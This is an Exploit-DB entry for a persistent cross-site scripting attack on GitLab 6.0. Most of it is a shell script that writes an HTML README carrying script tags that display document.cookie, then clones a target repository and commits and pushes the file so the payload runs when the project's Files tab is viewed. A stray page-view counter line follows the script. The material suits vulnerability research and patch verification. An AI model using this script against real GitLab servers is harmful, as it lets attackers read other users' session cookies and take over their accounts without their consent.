##Exploit-DB note: Tested commit 10b0b8f1797e6c09b4c063c04a4864ecd31d34f4 # Exploit Title: [gitlab persistent xss exploit] # Date: [12/16/2013] # Exploit Author: [hellok] # Vendor Homepage: gitlab.org #!/bin/sh #author hellok #for file format ext pwn for gitlab 12/16/2013 tee README.html > /dev/null <<'EOF' <!-- Markdown Source --> <!-- --> <html> <head> <title>README. [Generated]</title> <style> /* Taken from QLMarkdown: https://github.com/toland/qlmarkdown */ /* Extracted and interpreted from adcstyle.css and frameset_styles.css */ /* body */ body { margin: 20px 40px; background-color: #fff; color: #000; font: 13px "Myriad Pro", "Lucida Grande", Lucida, Verdana, sans-serif; } /* links */ a:link { color: #00f; text-decoration: none; } a:visited { color: #00a; text-decoration: none; } a:hover { color: #f60; text-decoration: underline; } a:active { color: #f60; text-decoration: underline; } /* html tags */ /* Work around IE/Win code size bug - courtesy Jesper, waffle.wootest.net */ * html code { font-size: 101%; } * html pre { font-size: 101%; } /* code */ pre, code { font-size: 11px; font-family: monaco, courier, consolas, monospace; } pre { margin-top: 5px; margin-bottom: 10px; border: 1px solid #c7cfd5; background: #f1f5f9; margin: 20px 0; padding: 8px; text-align: left; } hr { color: #919699; size: 1; width: 100%; noshade: "noshade" } /* headers */ h1, h2, h3, h4, h5, h6 { font-family: "Myriad Pro", "Lucida Grande", Lucida, Verdana, sans-serif; font-weight: bold; } h1 { margin-top: 1em; margin-bottom: 25px; color: #000; font-weight: bold; font-size: 30px; } h2 { margin-top: 2.5em; font-size: 24px; color: #000; padding-bottom: 2px; border-bottom: 1px solid #919699; } h3 { margin-top: 2em; margin-bottom: .5em; font-size: 17px; color: #000; } h4 { margin-top: 2em; margin-bottom: .5em; font-size: 15px; color: #000; } h5 { margin-top: 20px; margin-bottom: .5em; padding: 0; font-size: 13px; color: #000; } h6 { margin-top: 20px; margin-bottom: .5em; padding: 0; font-size: 11px; color: #000; } p { margin-top: 0px; margin-bottom: 10px; } /* lists */ ul { list-style: square outside; margin: 0 0 0 30px; padding: 0 0 12px 6px; } li { margin-top: 7px; } ol { list-style-type: decimal; list-style-position: outside; margin: 0 0 0 30px; padding: 0 0 12px 6px; } ol ol { list-style-type: lower-alpha; list-style-position: outside; margin: 7px 0 0 30px; padding: 0 0 0 10px; } ul ul { margin-left: 40px; padding: 0 0 0 6px; } li>p { display: inline } li>p+p { display: block } li>a+p { display: block } /* table */ table { border-top: 1px solid #919699; border-left: 1px solid #919699; border-spacing: 0; } table th { padding: 4px 8px 4px 8px; background: #E2E2E2; font-size: 12px; border-bottom: 1px solid #919699; border-right: 1px solid #919699; } table th p { font-weight: bold; margin-bottom: 0px; } table td { padding: 8px; font-size: 12px; vertical-align: top; border-bottom: 1px solid #919699; border-right: 1px solid #919699; } table td p { margin-bottom: 0px; } table td p + p { margin-top: 5px; } table td p + p + p { margin-top: 5px; } /* forms */ form { margin: 0; } button { margin: 3px 0 10px 0; } input { vertical-align: middle; padding: 0; margin: 0 0 5px 0; } select { vertical-align: middle; padding: 0; margin: 0 0 3px 0; } textarea { margin: 0 0 10px 0; width: 100%; } </style> </head> <body> <b>README.</b> - Generated on <b>2013å¹´12月 16æ—¥ 星期日 16æ—¶50分57秒 CST</b> by <b>hellok</b> using <a href="">Markdown</a>. Source is embedded. <hr> </body> <script>alert(/pwned by hellok,fresh cookie/)</script> <script>alert(document.cookie)</script> </html> EOF USAGE="$0: <git url>" if [ $# -lt 1 ]; then echo -e "Error: git url is required.\n$USAGE" >&2; exit 1; fi echo "pwn start" git clone $1 echo $(basename $1 | awk -F "." '{ print $1 }') cp README.html $(basename $1 | awk -F "." '{ print $1 "/"}') cd $(basename $1 | awk -F "." '{ print $1 }') git add * git commit -m "1" git push echo "DONE! Open your gitlab's Files TAB"Брой прочитания на тази страница: 618
Gitlab 6.0 – Persistent XSS